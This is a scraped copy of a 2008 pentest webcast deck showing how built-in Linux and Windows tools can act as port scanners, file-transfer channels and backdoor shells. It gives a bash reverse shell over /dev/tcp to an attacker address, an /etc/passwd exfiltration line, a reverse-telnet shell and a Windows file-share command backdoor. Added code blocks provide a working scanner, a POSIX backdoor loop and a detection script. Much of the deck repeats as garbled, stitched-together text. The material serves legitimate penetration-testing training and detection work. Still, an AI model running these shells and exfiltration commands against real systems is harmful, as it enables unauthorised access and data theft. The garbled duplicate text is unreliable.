httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38

Follow-Upbull SANS Security 560 Network Penetration Testing

and Ethical Hacking

bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20

bull Discount applies to 560 course through August

ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis

ndash July 24-29 Wash DC Skoudis

ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad

ndash Aug 24-29 Va Beach Strand

bull Go to wwwsansorg and look for ldquo560rdquo for details

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39

Outlinebull Why Penetration Testing

bull Windows Command Line Tips for PenTesters

bull Conclusions

bull QampA

ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008

Network Pen Testing & Ethical Hacking - ©2008, Ed Skoudis

What Is Netcat Without Netcat?

• Netcat without Netcat involves constructing commands that achieve Netcat behavior...
  – ...without the use of Netcat
• We'll rely on built-in tools only
• Remember those old AT&T commercials?
  – Have you ever kissed your baby goodnight... from a payphone?
  – Have you ever made a command shell backdoor using Linux's /dev/tcp?
  – Have you ever shoveled shell using Linux telnet clients?
  – Have you ever made a port scanner using a Windows FTP client?
  – Have you ever made the Windows file system behave like a command shell?
• YOU WILL

Why Netcat without Netcat?

• For penetration testers:
  – Netcat functionality is very useful in making one system attack another machine
  – But the project's rules of engagement may prohibit installation of additional software, such as Netcat, on compromised targets
  – Some anti-virus tools detect and block Netcat
  – Live off the land: Be a command-line MacGyver
  – Where we're going, we don't need Netcat

[Figure: the Attacker gains shell access on a Conquered Target and from there scans, analyzes and exploits the Next Target]

Useful Netcat Functions

• As we've seen, Netcat can be used in countless different ways
• Let's pick some of the most useful and see how we can make built-in tools do each function on Linux and Windows:
  – Backdoor shell
  – File transfer
  – Port scanner
• We'll vary the order in which we do each action, as we'll build from fundamental principles to more complex techniques
  – And the order of those principles differs between Linux and Windows

Linux

• /dev/tcp rocks
• On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
  – Opens a connection with the target IPaddr on that port
  – This is a bash feature (compiled in with --enable-net-redirections), not a kernel device: it is absent from /bin/sh where that is dash, and the Debian/Ubuntu exception describes the builds of the time; current Debian and Ubuntu bash packages enable it. A quick check on any box is bash -c 'echo > /dev/tcp/127.0.0.1/22': a "No such file or directory" error means the feature is missing, while "Connection refused" (or silent success) means it is present
• With a little command-line magic, we can use this for Netcat-like behavior

Linux Command-Line File Transfer

• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
  $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener (e.g. nc -l -p [port] > passwd.txt on the attacker's machine)

Linux Command-Line Backdoor via /dev/tcp

• We can connect Standard In, Standard Out and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor:
  /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to the attacker's waiting Netcat listener, where commands can be entered

[Figure: a Protected Server behind a firewall that blocks incoming connections runs /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1; the attacker runs nc -l -p [p], types commands there, and they are executed on the server]

Linux Command-Line Reverse Shell Backdoor In Action

[Screenshot]

Linux Command-Line Port Scanner

• To see if a single port is open, we could run:
  $ echo > /dev/tcp/[IPaddr]/[port]
• Note that the "Connection refused" text is not placed on Standard Output or Standard Error of the echo command
  – The shell itself reports the failed redirection, and because bash processes redirections left to right and abandons the command at the first one that fails, a 2>/dev/null added to that same command never takes effect
  – Redirecting Standard Error of the surrounding loop, or of a { ...; } group around the echo, does capture the message

[Screenshot: port 80 is listening]

Storing Results and Iterating

• But it does set the exit status variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers:
  $ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
  – I want this to be as operationally clean as possible for pen testers
  – Two caveats: -lt 1024 stops at port 1023 (use -le 1024 to include it), and a port whose packets a firewall silently drops makes the connect block until the kernel's TCP connect timeout expires, so the loop stalls on filtered ports rather than skipping them
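The loop above finds open ports, but two things bite on a real engagement: the shell's "Connection refused" text escapes the loop, and a filtered port stalls it. The following is an added example, not code from the original slides, showing the same /dev/tcp probe wrapped so that its error text is silenced and each attempt is bounded by timeout. It assumes bash and, where available, coreutils timeout on the target; the helper names probe_port and scan_ports, the 2-second default and the one-port-per-line output are this example's own choices.

```shell
#!/bin/sh
# Added example (not from the original slides): the /dev/tcp probe wrapped so
# that its error text is really silenced and a filtered port cannot stall the
# scan. Assumes bash and (optionally) coreutils `timeout` exist on the box.
# Helper names, the 2-second default and the output format are this example's.

# bash abandons a simple command at the first redirection that fails, so
# `echo > /dev/tcp/h/p 2>/dev/null` never reaches the 2>/dev/null. Doing the
# connect in a child bash whose stderr is redirected before it starts avoids
# that; `timeout` bounds the wait on ports whose packets are silently dropped.
# Exit status: 0 = connected (open); non-zero = refused, unreachable or timed out.
probe_port() {
    host="$1"; port="$2"; secs="${3:-2}"
    if command -v timeout >/dev/null 2>&1; then
        timeout "$secs" bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
    else
        bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
    fi
}

# Print each open port in [first, last] on its own line. The caller chooses
# where the results go, e.g. `>> /tmp/ports.txt` so a second session can
# `tail -f` it mid-scan, as the slide recommends.
scan_ports() {
    host="$1"; first="$2"; last="$3"; secs="${4:-2}"
    p="$first"
    while [ "$p" -le "$last" ]; do
        if probe_port "$host" "$p" "$secs"; then
            printf '%s\n' "$p"
        fi
        p=$((p + 1))
    done
}
```

Run it as scan_ports [IPaddr] 1 1024 >> /tmp/ports.txt and tail the file from another session. Because the connect happens in a child bash, the outer loop works from /bin/sh as well, and a timed-out probe (exit status 124 from timeout) is simply treated as not open, which is the right default for a scanner that must keep moving.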

Command-Line Port Scanner In Action

[Screenshot: port 5 reported as not closed]

Linux Command-Line Backdoor via "Reverse Telnet"

• There's a whole different way we can get remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to "Reverse telnet"
• On the target machine, we could run:
  $ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on the attacker's machine via port1 (a listener such as nc -l -p [port1])
• Receive output on the attacker's machine on port2 (a second listener, nc -l -p [port2])

Reverse Telnet Shell in Action

[Screenshot]

Windows

• Built-in command line has very clunky syntax
• Also, telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows

Building Blocks: Windows FOR Loops

• Iteration can be very helpful
  – We're not expecting you to be programmers
  – But sometimes you'll want to iterate over a given set of items
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops... some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings, or command output
• See the first webcast in this series for details on how these work... we won't go through them again here

Windows Port Scanner Using Telnet Client

• We could systematically telnet to port after port:
  – C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i
• Problem: When it finds an open port, it hangs
• How to address?
  – Watch it... When it stops, hit CTRL-] (the telnet client's escape character) and then type quit to resume
  – Or kill the telnet client every 5 seconds from a second command prompt:
    • C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
    • (1,0,2) is a step of zero, i.e. loop forever; ping -n 6 to localhost is the cmd.exe way to sleep about five seconds
  – Downside: Race condition may kill one that hasn't finished checking

More Problems with Windows Telnet Client as a Port Scanner

• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of the telnet client
      – Attempts at redirection either make it hang or not run
    • And the logging option of the Windows telnet client (-f [filename]; -l is the login name) overwrites all earlier logs... No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include the telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way

Windows Port Scanner Using FTP Client

• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify the port to connect to on the invocation command line... only connects to TCP port 21
• Solution: But you can specify the destination port in an FTP command file:
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration

The Windows Command Line Port Scanner Using FTP Client

• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly

Making It Store Results

• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
• The ftp client writes its connection errors to Standard Error, which is what 2>>ports.txt captures; read the file as a list of "Checking Port N" lines, where a port followed by an error message was closed and a port with no error beneath it accepted the connection

Windows Command-Line File Transfer

• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares:
• C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials...
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files

File Transfer in Action

[Screenshot]

Backdoors: The File Shell

• Now, let's do a backdoor
• Listening on a port is hard...
• But we can look in the file system
• A FOR loop can spin, looking for a command in a file, run the command, and dump output to another file:
• C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
  – The outer (1,0,2) loop never terminates; "delims=^" makes each whole line of commands.txt land in %j, and ping -n 2 to localhost sleeps about a second between polls

Using the File Shell

• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block...
  – Other folks are starting to use it, extending the idea
  – Use the FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
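The file shell is a polling loop: check for a command file, run each line, append the output, delete the command file, sleep, repeat. As an added example that is not from the original slides, and written in POSIX shell rather than cmd.exe so the pattern can be run and tested on Linux, here is the same loop with the two details that matter operationally: the command file is moved aside before it is read (so a half-written commands.txt is never executed and the trailing del cannot race the operator's next echo), and each command's exit status is recorded. A local directory stands in for \\[machine]\[share]; the helper names poll_once, file_shell_loop, send_command and read_output are this example's own.

```shell
#!/bin/sh
# Added example (not from the original slides): the Windows "file shell"
# polling loop rewritten in POSIX shell so it can be read and run on Linux.
# A directory stands in for \\[machine]\[share]; file names and helper names
# (poll_once, file_shell_loop, send_command, read_output) are this example's.

# Run every line of commands.txt once, append each command's stdout and
# stderr to output.txt, then remove the command file.
# Returns 0 if a command file was processed, 1 if there was nothing to do.
poll_once() {
    dir="$1"
    cmdfile="$dir/commands.txt"
    outfile="$dir/output.txt"
    [ -f "$cmdfile" ] || return 1
    # Take the file out of the way before reading it: the operator may still
    # be appending over the share, and this also replaces the trailing
    # "del commands.txt" of the Windows loop without racing new input.
    work="$dir/.commands.$$"
    mv "$cmdfile" "$work"
    while IFS= read -r line || [ -n "$line" ]; do
        [ -n "$line" ] || continue
        printf '### %s\n' "$line" >>"$outfile"
        # stdin from /dev/null so a command cannot swallow the rest of the
        # command file; record a non-zero status instead of losing it.
        sh -c "$line" </dev/null >>"$outfile" 2>&1 \
            || printf '### exit status %s\n' "$?" >>"$outfile"
    done <"$work"
    rm -f "$work"
    return 0
}

# The backdoor proper: spin forever, checking every two seconds. This is what
# `for /L %i in (1,0,2) do (...) & ping -n 2 127.0.0.1` does on Windows.
file_shell_loop() {
    mkdir -p "$1"
    while :; do
        poll_once "$1" || sleep 2
    done
}

# Operator side: queue a command, and read back everything produced so far
# (the equivalents of `echo ... > \\host\share\commands.txt` and
# `type \\host\share\output.txt`).
send_command() { printf '%s\n' "$2" >>"$1/commands.txt"; }
read_output()  { cat "$1/output.txt" 2>/dev/null; }
```

On the target, file_shell_loop /path/to/shared/dir & starts the backdoor; from the operator side, send_command /path/to/shared/dir 'id' followed by read_output /path/to/shared/dir drives it. The detection angle is the same as for the cmd.exe original: the loop stats commands.txt on every poll and output.txt only ever grows, so file-access auditing on the share shows the pattern even though no port is ever listening.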

The File Shell In Action

[Screenshot]

Outline

• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A

Conclusions

• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals

Follow-Up

• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to 560 course through August:
  – June 4-9, Las Vegas, NV, Skoudis
  – June 12-July 22, Home On-Line, Skoudis
  – July 24-29, Wash DC, Skoudis
  – Aug 11-16, Boston, Shackleford
  – Aug 18-23, Minneapolis, Conrad
  – Aug 24-29, Va Beach, Strand
• Go to www.sans.org and look for "560" for details

Outline

• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008

Page 13: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13

Why Netcat without Netcatbull For penetration testers

ndash Netcat functionality is very useful in making one systemattack another machine

ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on

compromised targets ndash Some anti-virus tools detect and block Netcat

ndash Live off the land Be a command-line MacGyver

ndash Where wersquore going we donrsquot need Netcat

Attacker

ConqueredTarget

Next Target

S h e l l

a c c ess

sca na na ly z eex p lo it

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14

Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless

different waysbull Letrsquos pick some of the most useful and see how we

can make built-in tools do each function on Linux and

Windows ndash Backdoor shell

ndash File transfer

ndash Port scanner

bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques

ndash And the order of those principles differs between Linux andWindows

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15

Linuxbull devtcp rocks

bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]

ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for

Netcat-like behavior

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16

Linux Command-Line File

Transfer

bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in

bull $ cat etcpasswd gt

devtcp[IPaddr][port]bull Catch it on the other side with a Netcat

listener

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17

Linux Command-Line

Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error

of a bash shell to devtcp to implement a reverse shellbackdoor

binbash ndashi gt

devtcp[Attacker_IPaddr][port] 0ltamp1

2gtamp1

bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered

binbash ndashi gt

devtcp

[Attacker_IPaddr]

[port] 0ltamp1 2gtamp1

Firewall

Blocks

incoming

Protected Servernc ndashl ndashp [p]

TYPE COMMANDS

HERE

Commands

executed

here

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18

Linux Command-Line Reverse

Shell Backdoor In Action

Li C d Li P t

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19

Linux Command-Line Port

Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]

bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file

Port 80 is listening

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20

Storing Results and Iterating

bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed

bull For a port scanner we could use a while loop

that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==

0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done

bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for

pen testers

d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21

Command-Line Port Scanner

In Action

5 Not Closed

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22

Linux Command-Line

Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote

shell without using devtcpbull Linux telnet clients let us redirect Standard In and

Standard Out

bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |

binbash | telnet [attacker_IPaddr][port2]

bull Provide commands on attackerrsquos machine via port1

bull Receive output on attackerrsquos machine on port2

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23

Reverse Telnet Shell in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24

Windowsbull Built-in command-line has very clunky syntax

bull Also telnet and ftp clients are absolutelyatrocious

ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out

bull Thus we will build Netcat-without-Netcat

from some fundamental command-linebuilding blocks in Windows

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25

Building Blocks

Windows FOR Loopsbull Iteration can be very helpful

ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of

itemsbull Numbers

bull Lines in a file

bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter

ndash FOR F Iterate over file contents strings or commandoutput

bull See the first webcast in this series for details on how

these workhellip we wonrsquot go through them again here

Windows Port Scanner Using

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26

Windows Port Scanner Using

Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i

bull Problem When it finds an open port it hangsbull How to address

ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume

ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where

name=telnetexe delete amp ping -n 6 127001

ndash Downside Race condition may kill one that hasnrsquot finished checking

M P bl ith Wi d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27

More Problems with Windows

Telnet Client as a Port Scannerbull Other problems

ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client

ndash Attempts at redirection either make it hang or not run

bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option

bull So you have to watch it sadly

ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land

bull There must be a better way

Wi d P t S U i

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28

Windows Port Scanner Using FTP Client

• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify the port to connect to on the invocation command line… it only connects to TCP port 21
• Solution: But you can specify the destination port in an FTP command file:
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration


The Windows Command Line Port Scanner Using FTP Client

• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly


Making It Store Results

• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt


Windows Command-Line File Transfer

• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares:
• C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials…
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files


File Transfer in Action


Backdoors: The File Shell

• Now, let's do a backdoor
• Listening on a port is hard…
• But we can look in the file system
• A FOR loop can spin looking for a command in a file, run the command, and dump output to another file
• C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1


Using the File Shell

• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use the FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
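Seen from the defender's side, the three Windows loops above (the FTP/telnet port scanners, the wmic telnet kill loop and the file shell) leave a distinctive trail in process-creation telemetry. The following Python is an added example, not from the original webcast or its author; the log records, their pipe-delimited format and the parent PIDs are constructed, and the burst thresholds are assumptions to tune.

```python
"""Flag the slides' Windows 'Netcat without Netcat' loops in process-creation telemetry.
  client-port-scan : ftp.exe -s:<file> / telnet.exe launched in a burst by one
                     parent cmd.exe (the FOR /L scanner loops)
  telnet-kill-loop : wmic process where name="telnet.exe" delete (the cleanup loop)
  file-shell-loop  : one parent repeatedly spawning ping -n N 127.0.0.1 (loopback
                     ping as sleep) plus cmd.exe /c children
Records are constructed; fields follow Sysmon Event ID 1 / Security 4688 naming.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import NamedTuple

SCAN_IMAGES = {"ftp.exe", "telnet.exe"}
BURST_COUNT = 5                       # tunable: launches per window that count as a scan
BURST_WINDOW = timedelta(seconds=60)
MIN_SLEEP_PINGS = 3                   # tunable: loopback pings from one parent
LOOPBACK_PING = re.compile(r"\bping(?:\.exe)?\b.*-n\s+\d+\s+127\.0\.0\.1", re.I)
CMD_C_CHILD = re.compile(r"\bcmd(?:\.exe)?\s+/c\s+\S", re.I)
WMIC_TELNET_KILL = re.compile(
    r'\bwmic(?:\.exe)?\s+process\s+where\s+name=["\']?telnet\.exe["\']?\s+delete', re.I)


class ProcEvent(NamedTuple):
    utc_time: datetime
    image: str            # full path of the started process
    command_line: str
    parent_pid: int


def parse_event(line: str) -> ProcEvent:
    """Parse one 'UtcTime|Image|CommandLine|ParentProcessId' record (constructed format)."""
    when, image, rest = line.split("|", 2)
    cmd, ppid = rest.rsplit("|", 1)
    return ProcEvent(datetime.strptime(when.strip(), "%Y-%m-%d %H:%M:%S"),
                     image.strip(), cmd.strip(), int(ppid))


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def burst_detected(times, count, window) -> bool:
    """True if any `count` timestamps fall inside one sliding `window`."""
    times = sorted(times)
    return any(times[i + count - 1] - times[i] <= window
               for i in range(len(times) - count + 1))


def detect(events):
    """Return sorted (rule, parent_pid) pairs, one finding per rule per parent."""
    findings = set()
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev.parent_pid].append(ev)
        if WMIC_TELNET_KILL.search(ev.command_line):
            findings.add(("telnet-kill-loop", ev.parent_pid))
    for ppid, evs in by_parent.items():
        # Each FOR /L iteration spawns ftp.exe/telnet.exe under the same cmd.exe; the
        # port sits in ftp.txt, not on the command line, so launch rate is the signal.
        if burst_detected([e.utc_time for e in evs if image_name(e.image) in SCAN_IMAGES],
                          BURST_COUNT, BURST_WINDOW):
            findings.add(("client-port-scan", ppid))
        # The parent cmd.exe performs the '>> output.txt' redirection, so it never
        # shows in the child's command line; what telemetry does show is the
        # loopback-ping sleeps plus cmd.exe /c children of one long-lived parent.
        pings = sum(1 for e in evs if image_name(e.image) == "ping.exe"
                    and LOOPBACK_PING.search(e.command_line))
        children = sum(1 for e in evs if image_name(e.image) == "cmd.exe"
                       and CMD_C_CHILD.search(e.command_line))
        if pings >= MIN_SLEEP_PINGS and children >= 1:
            findings.add(("file-shell-loop", ppid))
    return sorted(findings)


# Constructed sample telemetry (not from the original webcast).
SAMPLE_LOG = """\
2008-06-01 10:00:00|C:\\Windows\\System32\\ftp.exe|ftp -s:ftp.txt|4000
2008-06-01 10:00:01|C:\\Windows\\System32\\ftp.exe|ftp -s:ftp.txt|4000
2008-06-01 10:00:02|C:\\Windows\\System32\\ftp.exe|ftp -s:ftp.txt|4000
2008-06-01 10:00:03|C:\\Windows\\System32\\ftp.exe|ftp -s:ftp.txt|4000
2008-06-01 10:00:34|C:\\Windows\\System32\\ftp.exe|ftp -s:ftp.txt|4000
2008-06-01 10:05:00|C:\\Windows\\System32\\PING.EXE|ping -n 2 127.0.0.1|5000
2008-06-01 10:05:02|C:\\Windows\\System32\\PING.EXE|ping -n 2 127.0.0.1|5000
2008-06-01 10:05:03|C:\\Windows\\System32\\cmd.exe|cmd.exe /c whoami|5000
2008-06-01 10:05:04|C:\\Windows\\System32\\PING.EXE|ping -n 2 127.0.0.1|5000
2008-06-01 10:10:00|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic process where name="telnet.exe" delete|6000
2008-06-01 10:10:00|C:\\Windows\\System32\\PING.EXE|ping -n 6 127.0.0.1|6000
2008-06-01 10:10:06|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic process where name="telnet.exe" delete|6000
2008-06-01 11:00:00|C:\\Windows\\System32\\ftp.exe|ftp -s:deploy.txt|7000
2008-06-01 11:00:05|C:\\Windows\\System32\\PING.EXE|ping -n 4 fileserver|7000
"""


def scan_log(text: str):
    return detect([parse_event(ln) for ln in text.splitlines() if ln.strip()])


if __name__ == "__main__":
    for rule, ppid in scan_log(SAMPLE_LOG):
        print(f"{rule:18s} parent pid {ppid}")
```

Because the target port of the FTP scanner is only ever written into ftp.txt, file-creation telemetry on that file complements the launch-rate rule here.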


The File Shell In Action


Outline

• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A


Conclusions

• Netcat without Netcat shows that with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals


Follow-Up

